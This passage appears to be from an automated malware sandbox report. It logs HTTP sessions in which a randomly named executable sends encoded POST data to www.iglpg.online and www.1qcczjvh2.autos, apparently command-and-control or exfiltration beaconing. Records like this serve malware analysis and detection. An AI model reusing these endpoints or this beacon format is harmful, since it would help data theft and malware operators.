                                                        Origin: http://www.iglpg.online
                                                        Referer: http://www.iglpg.online/rbqc/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 30 6f 47 70 4c 71 45 4c 39 39 72 46 57 5a 67 6e 76 72 4e 44 51 77 79 72 56 30 69 4c 57 32 4a 79 57 53 63 45 56 71 41 73 77 6d 6c 2f 69 71 53 68 4d 49 79 69 57 73 34 35 63 56 74 45 59 55 73 67 43 49 31 77 52 6d 7a 6c 32 37 55 66 42 47 36 53 66 4e 64 37 51 4b 68 38 4c 67 46 33 6f 71 34 5a 79 54 37 52 44 49 64 6b 7a 65 6c 67 64 58 6d 77 6a 38 6d 4d 57 2b 79 48 47 50 56 68 2b 4f 38 37 44 54 75 67 30 6d 71 72 6f 6c 6e 51 48 74 2f 73 31 77 6e 4b 42 79 6e 36 6a 52 52 39 73 6b 55 5a 39 57 57 63 53 48 78 6e 52 71 47 32 73 31 41 4f 4f 75 35 5a 56 73 55 4b 51 51 51 3d
                                                        Data Ascii: OVldGJw=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKByn6jRR9skUZ9WWcSHxnRqG2s1AOOu5ZVsUKQQQ=
                                                        Dec 14, 2024 13:58:49.585004091 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.5499953.33.130.190803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:51.157341957 CET696OUTPOST /rbqc/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.iglpg.online
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 228
                                                        Origin: http://www.iglpg.online
                                                        Referer: http://www.iglpg.online/rbqc/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 46 39 79 59 54 73 45 55 72 41 73 33 6d 6c 2f 74 36 53 6f 43 6f 79 39 57 73 45 4c 63 58 35 45 59 55 34 67 43 4a 46 77 52 33 7a 71 31 4c 56 35 4d 6d 36 55 42 39 64 37 51 4b 68 38 4c 67 52 5a 6f 71 41 5a 79 6a 4c 52 42 70 64 6e 2b 2b 6c 6a 4c 48 6d 77 6e 38 6d 49 57 2b 79 78 47 4e 68 59 2b 49 34 37 44 53 65 67 30 33 71 73 6d 6c 6d 56 61 39 2b 47 78 79 58 43 4d 55 76 4c 69 52 51 5a 37 55 35 73 38 67 6e 32 49 6c 35 50 43 4b 71 4f 38 6d 49 35 66 65 59 77 50 50 45 36 4f 48 45 59 41 48 55 30 71 77 38 41 38 5a 77 4c 5a 45 4d 38 78 33 61 2b
                                                        Data Ascii: OVldGJw=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCKqO8mI5feYwPPE6OHEYAHU0qw8A8ZwLZEM8x3a+


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.5499963.33.130.190803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:53.816894054 CET1713OUTPOST /rbqc/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.iglpg.online
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1244
                                                        Origin: http://www.iglpg.online
                                                        Referer: http://www.iglpg.online/rbqc/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 45 46 79 59 6c 59 45 56 4d 55 73 32 6d 6c 2f 72 4b 53 6c 43 6f 7a 68 57 6f 51 50 63 58 6c 55 59 58 41 67 44 76 5a 77 47 31 58 71 69 37 56 35 51 57 36 56 66 4e 64 71 51 4b 78 34 4c 67 42 5a 6f 71 41 5a 79 6c 50 52 49 59 64 6e 74 75 6c 67 64 58 6d 38 6a 38 6e 76 57 2f 57 68 47 4e 6c 49 2b 59 59 37 41 79 4f 67 79 42 57 73 75 6c 6d 62 5a 39 2b 65 78 79 61 63 4d 56 47 79 69 53 4d 33 37 56 4e 73 2b 55 47 2b 56 47 5a 70 41 71 79 71 7a 77 68 41 4c 2b 59 48 46 4f 45 6e 4f 56 59 63 41 6e 35 5a 68 45 77 63 31 5a 34 46 59 51 6f 79 34 58 6a 66 49 4d 79 56 49 62 73 32 38 5a 46 73 61 4b 63 57 72 51 71 66 5a 65 49 70 41 49 6a 75 53 75 74 31 47 7a 4a 4a 6a 61 70 51 78 48 59 61 38 7a 6f 53 77 48 71 4b 58 44 4d 74 6c 75 51 5a 6a 68 47 4e 48 67 2f 69 61 74 41 7a 33 75 68 49 43 37 50 35 54 41 41 52 77 42 53 2b 36 77 43 2f 2f 56 76 33 51 46 70 4f 43 64 6f 75 65 32 78 2b 51 35 [TRUNCATED]
                                                        Data Ascii: OVldGJw=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXEFyYlYEVMUs2ml/rKSlCozhWoQPcXlUYXAgDvZwG1Xqi7V5QW6VfNdqQKx4LgBZoqAZylPRIYdntulgdXm8j8nvW/WhGNlI+YY7AyOgyBWsulmbZ9+exyacMVGyiSM37VNs+UG+VGZpAqyqzwhAL+YHFOEnOVYcAn5ZhEwc1Z4FYQoy4XjfIMyVIbs28ZFsaKcWrQqfZeIpAIjuSut1GzJJjapQxHYa8zoSwHqKXDMtluQZjhGNHg/iatAz3uhIC7P5TAARwBS+6wC//Vv3QFpOCdoue2x+Q5fpYhHl+ge/KkJ3NGeyDlwunbokoKzvVrk25LjGqX7PE8hf88XmuSGBJpeQ0XK5aA/lqGKI9DVeZWE299vqDz+qaLJqE+tOHLz84y7mHrnPW5rTt1fvPjyq2EPqZiLZxw9c/t4uHDZZ3x3NTD5pjo5SkGsazMJb7ju/xtv/M7dN6rijspiaLFR3j9O311Az6GJzAXANUHSWejzp0xOMdp465YcRuH88pEvycUV5tqH854XPBci153VFCTPh9R70NdoR8TliP9IipQ5qXJVmz8iXAHr99ms9UFEw6UvQSDkZFNxPuhse0RrQ0VORgdFeM6eZK60WZgc4zycDCFM3WVcxXw/0WyVb3k4sauA+9blRIFZI2PfNhft2yW5aD3FJvZnuFQilStgpfAnXMtbc/sMDHy8JA16xudVAhJ60LwgkppJJNtj91EcWe2HZoi6IsvVcq3HMQ4zq3fYDxXTxuZaCyI51wmuQS/o3pBihXQPOiwqissGkp4vFYBU5oUwHBk4nrvQOOl1+Qj89DfmNuH2dnuLSWo/nRmgHubZihkqTyD7d1fHxsAIiQ+LhTsFOl4RVe/yFx/b/aEN6H0VBwsM9oxPCQ+BdX/Op7lZGG6v3eQeow3s5zuIjBKfqdrclgmN92TyQf/trl2Y0wb+VmVv9Rx6rR20n8m9f [TRUNCATED]
                                                        Dec 14, 2024 13:58:54.910409927 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.5499973.33.130.190803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:56.481589079 CET423OUTGET /rbqc/?OVldGJw=3OhzIPQDpE/WyOq7Ap5YzcvodMsyqKhwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rlu95wMgHAHM1mSs1zJwZJ5t13zgPyFY5h6K1xMGitp/XiNQ==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.iglpg.online
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Dec 14, 2024 13:59:05.599287987 CET396INHTTP/1.1 200 OK
                                                        content-type: text/html
                                                        date: Sat, 14 Dec 2024 12:59:05 GMT
                                                        content-length: 275
                                                        connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 56 6c 64 47 4a 77 3d 33 4f 68 7a 49 50 51 44 70 45 2f 57 79 4f 71 37 41 70 35 59 7a 63 76 6f 64 4d 73 79 71 4b 68 77 46 48 43 38 56 68 47 67 59 57 6c 42 4e 43 51 4d 52 62 41 30 34 6c 59 58 68 63 69 62 4f 64 47 61 61 59 51 55 45 33 68 2f 64 58 4d 38 49 37 56 47 4e 33 72 6c 75 39 35 77 4d 67 48 41 48 4d 31 6d 53 73 31 7a 4a 77 5a 4a 35 74 31 33 7a 67 50 79 46 59 35 68 36 4b 31 78 4d 47 69 74 70 2f 58 69 4e 51 3d 3d 26 4f 50 3d 51 58 5a 50 77 44 4e 48 30 42 47 30 74 74 64 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OVldGJw=3OhzIPQDpE/WyOq7Ap5YzcvodMsyqKhwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rlu95wMgHAHM1mSs1zJwZJ5t13zgPyFY5h6K1xMGitp/XiNQ==&OP=QXZPwDNH0BG0ttd0"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.549998129.226.153.85803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:59:11.166127920 CET685OUTPOST /pfw9/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.1qcczjvh2.autos
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 208
                                                        Origin: http://www.1qcczjvh2.autos
                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 45 78 6f 6e 6a 4a 45 4f 37 62 54 49 76 67 72 6f 38 49 73 4a 6f 70 65 63 65 6c 39 4c 59 6c 4c 79 77 63 59 42 2f 69 4f 47 71 43 34 4e 50 6b 44 4f 2b 59 66 68 7a 73 38 33 4f 35 42 4c 53 62 49 49 4a 71 78 39 4b 5a 4b 47 4e 32 31 79 45 32 31 41 51 35 72 6a 66 75 55 63 47 46 52 51 47 68 68 32 4a 56 39 77 5a 2b 4f 52 32 49 6b 65 71 68 49 7a 47 67 32 30 6f 47 56 73 76 48 56 52 42 42 49 42 6a 69 56 4a 57 52 55 71 37 79 33 48 58 30 6c 49 58 42 6f 49 4b 66 50 63 32 6c 6f 73 69 46 34 39 65 37 6d 7a 30 6e 45 64 62 75 34 76 4c 4f 66 63 74 77 35 4a 4e 6e 72 2b 71 54 51 3d
                                                        Data Ascii: OVldGJw=17NZVBLvh1g4ExonjJEO7bTIvgro8IsJopecel9LYlLywcYB/iOGqC4NPkDO+Yfhzs83O5BLSbIIJqx9KZKGN21yE21AQ5rjfuUcGFRQGhh2JV9wZ+OR2IkeqhIzGg20oGVsvHVRBBIBjiVJWRUq7y3HX0lIXBoIKfPc2losiF49e7mz0nEdbu4vLOfctw5JNnr+qTQ=
                                                        Dec 14, 2024 13:59:12.694175959 CET1236INHTTP/1.1 404 Not Found
                                                        Server: Tengine
                                                        Date: Sat, 14 Dec 2024 12:59:12 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 58296
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "675bd032-e3b8"
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                        Dec 14, 2024 13:59:12.694251060 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                        Dec 14, 2024 13:59:12.694288015 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                        Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                        Dec 14, 2024 13:59:12.694345951 CET672INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                        Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                        Dec 14, 2024 13:59:12.694384098 CET1236INData Raw: 42 6b 44 6f 41 49 2b 33 63 2b 39 2f 41 41 42 52 59 4c 36 53 38 48 77 44 77 30 64 49 57 69 4b 77 4b 43 68 2f 78 31 67 4a 6f 43 59 31 71 39 34 6a 69 51 74 2f 6e 49 6e 4e 51 78 49 50 69 41 59 7a 42 70 30 70 41 53 53 39 59 37 54 6f 73 66 2f 43 4b 70
                                                        Data Ascii: BkDoAI+3c+9/AABRYL6S8HwDw0dIWiKwKCh/x1gJoCY1q94jiQt/nInNQxIPiAYzBp0pASS9Y7Tosf/CKpv4eFOLx/i7kl7P/41Uc+Rd1ngHQ8aoEpGRxCA60J/J2nc2IfSTOZ9mR8e8AeL+oixKyM1+9NbzD6g6rjoUKRBVEiZWWJCopMVaSMQQzhlIMqNrs245++9/b9q8MSK27uI2gUamfAXBQlNhdibFEkUn3LJKUZBXFu2
                                                        Dec 14, 2024 13:59:12.694421053 CET1236INData Raw: 32 69 39 70 70 39 30 76 35 54 2b 57 39 6b 4d 6b 41 4d 42 2b 32 31 52 49 41 41 41 77 49 32 48 37 35 37 6b 71 32 49 48 34 37 72 4f 4a 4d 47 36 59 61 41 4d 74 6f 65 4b 73 33 6d 6c 61 73 64 49 35 41 4f 62 62 61 46 53 55 70 47 42 7a 4c 41 5a 67 74 68
                                                        Data Ascii: 2i9pp90v5T+W9kMkAMB+21RIAAAwI2H757kq2IH47rOJMG6YaAMtoeKs3mlasdI5AObbaFSUpGBzLAZgthyWhkKrRHpzHKYe1+uhMocxnRdZYeHJhMMFm9RVKFiWWCZ63mb4Dxqw4cfWMWbS+zh4u1PkIHNHRl2tO+Brdmk8FoGRtbAmLiv1Ogd0/mn4hkUYABiW2VsaarTwxeTr7LG4MGNtvw1QNtRDed/WODIGj07balBgrUz
                                                        Dec 14, 2024 13:59:12.694456100 CET1236INData Raw: 34 2b 76 71 7a 55 38 4d 78 49 32 34 67 69 67 72 74 38 4e 47 47 5a 55 70 69 49 6c 48 68 4f 59 55 63 6b 41 48 47 6e 59 43 66 31 6e 61 46 5a 34 59 6b 4e 74 33 34 6e 35 34 53 47 6f 78 36 6a 63 47 6f 62 32 59 77 36 73 63 43 32 41 68 5a 4d 50 4a 72 79
                                                        Data Ascii: 4+vqzU8MxI24gigrt8NGGZUpiIlHhOYUckAHGnYCf1naFZ4YkNt34n54SGox6jcGob2Yw6scC2AhZMPJryJpiVQCofLWq3wbWq1Kx76KtF/deTTwKX80dJEobwfAGNH+F7yjB4TWsXKt507mUO/NOvDd/172stDGBGt3yz48bF044+FtUKa1PR564/AUpNQCaARgNYDuAGINRP9Ng1NsKgPxXwxizWU0l22zpuHvw2FxYxV1FGu
                                                        Dec 14, 2024 13:59:12.694494009 CET1236INData Raw: 47 74 65 77 4a 6e 6e 76 65 78 69 31 75 41 59 68 77 72 4f 66 2f 4b 61 49 41 48 4c 64 6e 6c 47 57 79 44 76 33 70 7a 4a 51 75 75 4a 50 53 45 77 77 50 54 35 74 39 76 5a 71 31 71 64 51 30 6e 69 50 36 55 78 71 47 41 65 41 34 75 68 78 61 70 66 6c 42 2b
                                                        Data Ascii: GtewJnnvexi1uAYhwrOf/KaIAHLdnlGWyDv3pzJQuuJPSEwwPT5t9vZq1qdQ0niP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Q
                                                        Dec 14, 2024 13:59:12.694529057 CET1236INData Raw: 6e 42 4b 6a 6d 2b 5a 68 75 4e 53 65 75 51 70 32 4b 63 32 42 62 30 66 52 33 46 68 58 72 4b 57 32 66 52 37 2b 51 79 4e 4f 51 69 33 58 59 4a 54 58 58 38 76 6e 35 6c 48 6e 31 6b 5a 44 61 42 37 4c 38 44 67 63 56 48 39 4b 38 59 6f 58 39 52 43 51 43 67
                                                        Data Ascii: nBKjm+ZhuNSeuQp2Kc2Bb0fR3FhXrKW2fR7+QyNOQi3XYJTXX8vn5lHn1kZDaB7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mp
                                                        Dec 14, 2024 13:59:12.694564104 CET1236INData Raw: 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66 65 41 6e 54 71 79 58 61 61 69 73 4d 39 4b 69 78 45 77 67 4f 41 2f 6f 30 2b 76 51 42 41 38 64 72 4a 6a 5a 53 73 52 5a 66 33 7a 43 42 6b 35 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61 74 32
                                                        Data Ascii: 4skpSdQAI0GkmU9feAnTqyXaaisM9KixEwgOA/o0+vQBA8drJjZSsRZf3zCBk5gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dgN3


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.549999129.226.153.85803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:59:13.875137091 CET705OUTPOST /pfw9/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.1qcczjvh2.autos
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 228
                                                        Origin: http://www.1qcczjvh2.autos
                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 76 79 33 35 6b 42 2b 67 6d 47 35 79 34 4e 42 45 44 50 78 34 65 76 7a 73 77 56 4f 38 35 4c 53 62 73 49 4a 76 56 39 4b 71 69 4a 4d 6d 31 4b 63 47 31 43 64 5a 72 6a 66 75 55 63 47 46 46 32 47 68 35 32 4a 6c 4e 77 5a 63 6d 65 37 6f 6b 5a 39 52 49 7a 43 67 32 77 6f 47 56 65 76 47 59 2b 42 44 41 42 6a 67 64 4a 58 45 67 70 78 79 32 43 61 55 6b 39 59 42 45 45 46 2b 72 75 72 47 49 73 35 32 55 6c 53 74 58 5a 75 46 4d 31 49 4f 55 58 62 64 58 72 38 41 59 67 58 45 37 4f 30 45 46 68 68 4c 59 5a 7a 41 38 6a 63 52 39 71 4b 49 36 50 74 4e 73 69
                                                        Data Ascii: OVldGJw=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXvy35kB+gmG5y4NBEDPx4evzswVO85LSbsIJvV9KqiJMm1KcG1CdZrjfuUcGFF2Gh52JlNwZcme7okZ9RIzCg2woGVevGY+BDABjgdJXEgpxy2CaUk9YBEEF+rurGIs52UlStXZuFM1IOUXbdXr8AYgXE7O0EFhhLYZzA8jcR9qKI6PtNsi
                                                        Dec 14, 2024 13:59:15.377321959 CET1236INHTTP/1.1 404 Not Found
                                                        Server: Tengine
                                                        Date: Sat, 14 Dec 2024 12:59:15 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 58296
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "675bd032-e3b8"
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
